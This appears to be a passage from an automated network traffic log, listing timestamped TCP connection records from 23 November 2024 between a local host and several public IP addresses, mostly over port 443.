                                                                                                                                                                Nov 23, 2024 20:36:01.482647896 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.489021063 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.489089012 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.489099026 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.497257948 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.497312069 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.497411013 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.501574993 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.501601934 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.501624107 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.501641989 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.501656055 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.501684904 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.501688004 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.501709938 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.501729965 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.501749039 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.514183044 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.526880026 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.526949883 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.526957989 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.539525986 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.539583921 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.539592981 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.546333075 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.546386957 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.546395063 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.548871994 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.548873901 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.548891068 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.548892975 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.553024054 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.553078890 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.553086996 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.563465118 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.563523054 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.563532114 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.566549063 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.566638947 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.566647053 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.567257881 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.567320108 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.567326069 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.570815086 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.570888996 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.570897102 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.573179007 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.573246002 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.573254108 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.573281050 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.573323011 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.577985048 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.578066111 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.578071117 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.578094959 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.578144073 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.580005884 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.580080986 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.580141068 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.580163002 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.586379051 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.586622953 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.586674929 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.586707115 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.589525938 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.589591980 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.589601994 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.593482971 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.593545914 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.593554020 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.593765020 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.593820095 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.594340086 CET49753443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.594360113 CET44349753104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.594639063 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.594696045 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.594713926 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.598897934 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.598958969 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.598968983 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.602791071 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.603013039 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.603085995 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.603106022 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.606678009 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.606739998 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.606772900 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.608201027 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.608267069 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.608277082 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.611433983 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.611510992 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.611524105 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.614361048 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.614413023 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.614437103 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.617451906 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.617522955 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.617531061 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.619821072 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.619884014 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.619896889 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.622015953 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.622070074 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.622080088 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.628145933 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.628220081 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.628232002 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.630717993 CET80497232.20.68.201192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.630793095 CET4972380192.168.2.42.20.68.201
                                                                                                                                                                Nov 23, 2024 20:36:01.636065006 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.636128902 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.636136055 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.637254953 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.637310028 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.637324095 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.641552925 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:01.641582012 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.641645908 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:01.641839981 CET49760443192.168.2.4104.17.25.14
                                                                                                                                                                Nov 23, 2024 20:36:01.641855001 CET44349760104.17.25.14192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.644802094 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.644864082 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.644876003 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.644973993 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.645025969 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.645042896 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.645314932 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.645365000 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.645371914 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.652690887 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.652714014 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.652766943 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.652785063 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.652833939 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.653058052 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.653107882 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.653112888 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.654603958 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.654661894 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.654670000 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.659430027 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.660469055 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.660536051 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.660541058 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.664014101 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.664084911 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.664094925 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.666227102 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.666275978 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.666284084 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.667932987 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.667989969 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.667999983 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.673073053 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.673130989 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.673139095 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.675515890 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.675578117 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.675582886 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.679820061 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.679874897 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.679882050 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.693264008 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.693291903 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.693336964 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.693353891 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.693403006 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.708345890 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.708354950 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.723545074 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.723561049 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.754951954 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.770687103 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.773510933 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.773706913 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.773721933 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.773772001 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.773785114 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.774204969 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.774241924 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.774297953 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.774669886 CET49761443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.774684906 CET44349761104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.775065899 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.775122881 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.775130033 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.780497074 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.780549049 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.780560017 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.783375025 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.783442020 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.783453941 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.787717104 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.787781000 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.787790060 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.792001009 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.792064905 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.792078972 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.805517912 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.805584908 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.805596113 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.805634975 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.815112114 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.815133095 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.815180063 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.822379112 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824031115 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824055910 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824100018 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824112892 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.824120045 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824137926 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824143887 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.824163914 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.824167013 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824182987 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.824192047 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824208975 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.824594021 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824616909 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824650049 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.824661016 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.824681997 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.825344086 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.825403929 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.825424910 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.825438023 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.825484037 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.825815916 CET49756443192.168.2.4104.18.10.207
                                                                                                                                                                Nov 23, 2024 20:36:01.825829029 CET44349756104.18.10.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.834136009 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.834193945 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.834203959 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.834244013 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.839018106 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.839036942 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.839071989 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.848620892 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.848690987 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.848699093 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.848741055 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.853904009 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.853925943 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.853964090 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.853965998 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.853984118 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.853996038 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.854013920 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.854026079 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.854046106 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.858037949 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.858056068 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.858095884 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.872773886 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.872828960 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.872837067 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.872875929 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.875093937 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.875149965 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.884557962 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.884619951 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.887862921 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.887909889 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.887927055 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.887950897 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.887963057 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.887968063 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.888001919 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:01.897444963 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.897506952 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.983117104 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.983202934 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.989734888 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.989799976 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:01.999146938 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:01.999207020 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.008833885 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.008898020 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.010823965 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.010854006 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.010900021 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.010910034 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.010921955 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.010972023 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.010972023 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.011002064 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.011060953 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.013650894 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.013715029 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.023350954 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.023416042 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.027987003 CET44349752104.18.11.207192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.028050900 CET49752443192.168.2.4104.18.11.207
                                                                                                                                                                Nov 23, 2024 20:36:02.031527996 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.031583071 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.031624079 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.031647921 CET44349755151.101.194.137192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:02.031678915 CET49755443192.168.2.4151.101.194.137
                                                                                                                                                                Nov 23, 2024 20:36:02.031698942 CET49755443192.168.2.4151.101.194.137
